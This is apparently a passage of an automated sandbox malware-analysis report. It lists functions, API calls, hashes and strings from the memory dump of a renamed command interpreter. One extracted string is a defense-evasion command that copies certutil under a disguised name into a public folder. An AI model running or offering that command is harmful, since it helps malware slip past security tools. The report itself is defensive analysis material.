                                        • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,0000000A,?,00000002,00000000,?,?,0000002F,00007FF7CD4AE964), ref: 00007FF7CD4AF003
                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,0000000A,?,00000002,00000000,?,?,0000002F,00007FF7CD4AE964), ref: 00007FF7CD4AF022
                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,0000000A,?,00000002,00000000,?,?,0000002F,00007FF7CD4AE964), ref: 00007FF7CD4AF083
                                        • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,0000000A,?,00000002,00000000,?,?,0000002F,00007FF7CD4AE964), ref: 00007FF7CD4AF092
                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,0000000A,?,00000002,00000000,?,?,0000002F,00007FF7CD4AE964), ref: 00007FF7CD4AF0A5
                                        • towupper.MSVCRT(?,?,?,?,0000000A,?), ref: 00007FF7CD4AF0DB
                                        • wcschr.MSVCRT(?,?,?,?,0000000A,?,00000002,00000000,?,?,0000002F,00007FF7CD4AE964), ref: 00007FF7CD4AF135
                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,0000000A,?,00000002,00000000,?,?,0000002F,00007FF7CD4AE964), ref: 00007FF7CD4AF16C
                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,0000000A,?,00000002,00000000,?,?,0000002F,00007FF7CD4AE964), ref: 00007FF7CD4AF185
                                          • Part of subcall function 00007FF7CD4901B8: _get_osfhandle.MSVCRT ref: 00007FF7CD4901C4
                                          • Part of subcall function 00007FF7CD4901B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7CD49E904,?,?,?,?,00000000,00007FF7CD493491,?,?,00000000,00007FF7CD4A4420), ref: 00007FF7CD4901D6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_get_osfhandle_wcsuprtowupperwcschr
                                        • String ID: <noalias>$CMD.EXE
                                        • API String ID: 1161012917-1690691951
                                        • Opcode ID: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                        • Instruction ID: 4e3c0843de50850b4fe100313f1512b8d9d8aa4f9707322f8eeeaf3b5cd027c3
                                        • Opcode Fuzzy Hash: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                        • Instruction Fuzzy Hash: 43919321B0DA529AFB04BF61D8040BDBAA1AF59B74F844135EF2E526D5FF3CA6458330
                                        Function 00007FF7CD4832B0 Relevance: 27.2, APIs: 18, Instructions: 243COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00007FF7CD493578: _get_osfhandle.MSVCRT ref: 00007FF7CD493584
                                          • Part of subcall function 00007FF7CD493578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,0000000A,?,00000000,00000014), ref: 00007FF7CD49359C
                                          • Part of subcall function 00007FF7CD493578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,0000000A,?,00000000,00000014), ref: 00007FF7CD4935C3
                                          • Part of subcall function 00007FF7CD493578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,0000000A,?,00000000,00000014), ref: 00007FF7CD4935D9
                                          • Part of subcall function 00007FF7CD493578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,0000000A,?,00000000,00000014), ref: 00007FF7CD4935ED
                                          • Part of subcall function 00007FF7CD493578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7CD4832E8,?,?,?,?,?,?,?,?,0000000A,?,00000000,00000014), ref: 00007FF7CD493602
                                        • _get_osfhandle.MSVCRT ref: 00007FF7CD4832F3
                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,0000000A,?,00000000,00000014,?,?,0000002F,00007FF7CD4832A4), ref: 00007FF7CD483309
                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7CD483384
                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7CD4A11DF
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Console$LockShared_get_osfhandle$AcquireBufferErrorFileHandleInfoLastModeReleaseScreenTypeWrite
                                        • String ID:
                                        • API String ID: 611521582-0
                                        • Opcode ID: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                        • Instruction ID: 9e5799fdc5fe692cc65ee4aa0a0eecbb6b4a2efd42280abfbdbf4bb7a08923ea
                                        • Opcode Fuzzy Hash: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                        • Instruction Fuzzy Hash: 93A1A532B0CA12D6E714AF61E8182BDF6A2FB49BA5F844135CF1E86754EF3CA545C720
                                        Function 00007FF7CD481560 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 338fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Find$File$CloseFirstmemset$AttributesErrorLastNext
                                        • String ID: \\?\
                                        • API String ID: 628682198-4282027825
                                        • Opcode ID: bfecd11a4866ca550013cb8df7d01d0eb9b862476b4829b349704babc3ba77e1
                                        • Instruction ID: 29c55dba9c3ca7ba56b6056841f8851fa4b075222ca748d6f365c69e6b3eef11
                                        • Opcode Fuzzy Hash: bfecd11a4866ca550013cb8df7d01d0eb9b862476b4829b349704babc3ba77e1
                                        • Instruction Fuzzy Hash: 6EE1A321B0C682D6EB60AF25D8446F9A3A1EB547A8F844136DF6E87794FF3CE645C310
                                        Function 00007FF7CD4AAFBC Relevance: 26.0, APIs: 17, Instructions: 537COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: wcschr$memset$ErrorFileHeapLast$AllocAttributesCloseFindMoveProcessProgressWith_setjmpiswspacelongjmpwcsrchr
                                        • String ID:
                                        • API String ID: 16309207-0
                                        • Opcode ID: aeb120db068727e28786c75b5313561eaf1c3474a7666ce33f66a1440c033bc1
                                        • Instruction ID: 7dc81181f799edf091876d562194689599abd901a18f2449f5e9d13823b1eabb
                                        • Opcode Fuzzy Hash: aeb120db068727e28786c75b5313561eaf1c3474a7666ce33f66a1440c033bc1
                                        • Instruction Fuzzy Hash: 5322A022B08B8286EB65AF25D8542F9B7A1FF457A4F804135DF2E4B795EF3CE2458310
                                        Function 00007FF7CD48CE10 Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 337COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: CriticalSection$ConsoleEnterInfoLeaveOutput_tell_wcsicmpmemset
                                        • String ID: GOTO$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                        • API String ID: 3863671652-4137775220
                                        • Opcode ID: feb1bbf7feb49ee9d99dd0502c92dc49cdd19241ad0cb0e0275a55cbab1dd980
                                        • Instruction ID: f248013f9e883636b4acd5f35264bcea3028818632da8f5bc16538ef113bcc31
                                        • Opcode Fuzzy Hash: feb1bbf7feb49ee9d99dd0502c92dc49cdd19241ad0cb0e0275a55cbab1dd980
                                        • Instruction Fuzzy Hash: A4E19D21B0D64286FA60BF66E854779E6A5AF857B0FC44035DF2D822D5FF3CEA418720
                                        Function 00007FF7CD483410 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 160windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
                                        • String ID: $Application$System
                                        • API String ID: 3538039442-1881496484
                                        • Opcode ID: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                                        • Instruction ID: 2b9f630ffcd6e6f7ac486c2523723558a87f843ad4f0cea80d3a7f3077a48259
                                        • Opcode Fuzzy Hash: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                                        • Instruction Fuzzy Hash: 4051AB32B0CB4192EA20AF55E40467AFAA2FB89BA4F848135DF6E43754EF3CD6058710
                                        Function 00007FF7CD4AD9D0 Relevance: 23.3, APIs: 10, Strings: 3, Instructions: 576fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • longjmp.MSVCRT(?,?,00000000,00007FF7CD4A048E), ref: 00007FF7CD4ADA58
                                        • memset.MSVCRT ref: 00007FF7CD4ADAD6
                                        • memset.MSVCRT ref: 00007FF7CD4ADAFC
                                        • memset.MSVCRT ref: 00007FF7CD4ADB22
                                          • Part of subcall function 00007FF7CD493A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7CD4AEAC5,?,?,?,00007FF7CD4AE925,?,?,?,?,00007FF7CD48B9B1), ref: 00007FF7CD493A56
                                          • Part of subcall function 00007FF7CD485194: VirtualAlloc.API-MS-WIN-CORE-MEMORY-L1-1-0 ref: 00007FF7CD4851C4
                                          • Part of subcall function 00007FF7CD49823C: FindFirstFileExW.KERNELBASE ref: 00007FF7CD498280
                                          • Part of subcall function 00007FF7CD49823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7CD49829D
                                          • Part of subcall function 00007FF7CD4901B8: _get_osfhandle.MSVCRT ref: 00007FF7CD4901C4
                                          • Part of subcall function 00007FF7CD4901B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7CD49E904,?,?,?,?,00000000,00007FF7CD493491,?,?,00000000,00007FF7CD4A4420), ref: 00007FF7CD4901D6
                                          • Part of subcall function 00007FF7CD484FE8: _get_osfhandle.MSVCRT ref: 00007FF7CD485012
                                          • Part of subcall function 00007FF7CD484FE8: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7CD485030
                                        • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7CD4ADDB0
                                          • Part of subcall function 00007FF7CD4859E4: CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7CD485A2E
                                          • Part of subcall function 00007FF7CD4859E4: _open_osfhandle.MSVCRT ref: 00007FF7CD485A4F
                                        • _get_osfhandle.MSVCRT ref: 00007FF7CD4ADDEB
                                        • SetEndOfFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7CD4ADDFA
                                        • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7CD4AE204
                                        • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7CD4AE223
                                        • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7CD4AE242
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: File$_get_osfhandlememset$Find$AllocAttributesCloseCreateErrorFirstLastReadTypeVirtual_open_osfhandlelongjmp
                                        • String ID: %9d$%s$~
                                        • API String ID: 3651208239-912394897
                                        • Opcode ID: bd92ea359e7dfbf02f7d23f55cbe5c15862248cc3031b8413fe66a0113feaca6
                                        • Instruction ID: b94ce77730f8bbcf9c2dbed0f8b6f6cbff53ae0af66a8e4476c83bd1e34ed27a
                                        • Opcode Fuzzy Hash: bd92ea359e7dfbf02f7d23f55cbe5c15862248cc3031b8413fe66a0113feaca6
                                        • Instruction Fuzzy Hash: 15427132B0C6828AE764BF25D8506F9B7A5FB85764F900035EF6D47A99EF3CE6408710
                                        Function 00007FF7CD48372C Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 396COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: wcsrchr$ErrorLast$AttributesFile_wcsnicmpiswspacememsetwcschr
                                        • String ID: COPYCMD$\
                                        • API String ID: 3989487059-1802776761
                                        • Opcode ID: d8d0bfbfdfe82cdd3103f4725bc29693bb562c2c5d4d39e0cb153c4cce5fb559
                                        • Instruction ID: 18a06a8cdf1545fa4d115c061eab6037dabb58c7c9a720ffedfa68ee630bbffa
                                        • Opcode Fuzzy Hash: d8d0bfbfdfe82cdd3103f4725bc29693bb562c2c5d4d39e0cb153c4cce5fb559
                                        • Instruction Fuzzy Hash: 2DF1B265B0C74682EA24BF1598442BAB3A1EF55BE8F848035CF6E87795FE3CE6458310
                                        Function 00007FF7CD493140 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 229timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Time$File$System$FormatInfoLocalLocale
                                        • String ID: $%02d%s%02d%s$%2d%s%02d%s%02d%s%02d$.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$HH:mm:ss t
                                        • API String ID: 55602301-2548490036
                                        • Opcode ID: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                                        • Instruction ID: 9be6315d5deab7ceaa7c7e26fdc25d3119429993e57073a66e82ed2ec4537b85
                                        • Opcode Fuzzy Hash: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                                        • Instruction Fuzzy Hash: 45A18F32B0D64296EA10AF52E440AB9F7AAFB95764FD00135EF6E02694FF3CE644C710
                                        Function 00007FF7CD4B1538 Relevance: 19.7, APIs: 13, Instructions: 169filememorynativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememmove$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType_wcsicmp
                                        • String ID:
                                        • API String ID: 3935429995-0
                                        • Opcode ID: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                                        • Instruction ID: f212d6428fa9398c4682352b6783e40207a4e27f1de67dfbeedfba8d6fdd3a28
                                        • Opcode Fuzzy Hash: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                                        • Instruction Fuzzy Hash: 2661E226B1CA92D6EB10AF62A404579FBA5FF98F64F858131DF5A43790EF3CD6018710
                                        Function 00007FF7CD4835B8 Relevance: 18.2, APIs: 12, Instructions: 214COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: 7911f8452db39d7657d313559ed3967f3c9c4d9a39ee1e7965673abb96ed0397
                                        • Instruction ID: 9df834f2206d5046f49a453d9d26553124fcc18d73594a1db563f4b3058e82e1
                                        • Opcode Fuzzy Hash: 7911f8452db39d7657d313559ed3967f3c9c4d9a39ee1e7965673abb96ed0397
                                        • Instruction Fuzzy Hash: 2B91903270CA82C6EB24AF29D8142F9B6A1FB55764F844136DF6E86694EE3C9644C310
                                        Function 00007FF7CD48B0D8 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 320COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: _get_osfhandlememset$wcschr
                                        • String ID: DPATH
                                        • API String ID: 3260997497-2010427443
                                        • Opcode ID: 61e475784263ec0578ee4568f0ecfacc12e0da9f92d71443f4b7f45241f80286
                                        • Instruction ID: 3ad97028dfcbc0501311627a27e6b0d1e673f3b9f74773ae7eea891f3f8c0722
                                        • Opcode Fuzzy Hash: 61e475784263ec0578ee4568f0ecfacc12e0da9f92d71443f4b7f45241f80286
                                        • Instruction Fuzzy Hash: 40D17D22B0C64286EB20AF66D844579A2A6FB44BA4F844235DF3D477D5EF3CEA41C760
                                        Function 00007FF7CD497FF8 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 87filenativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
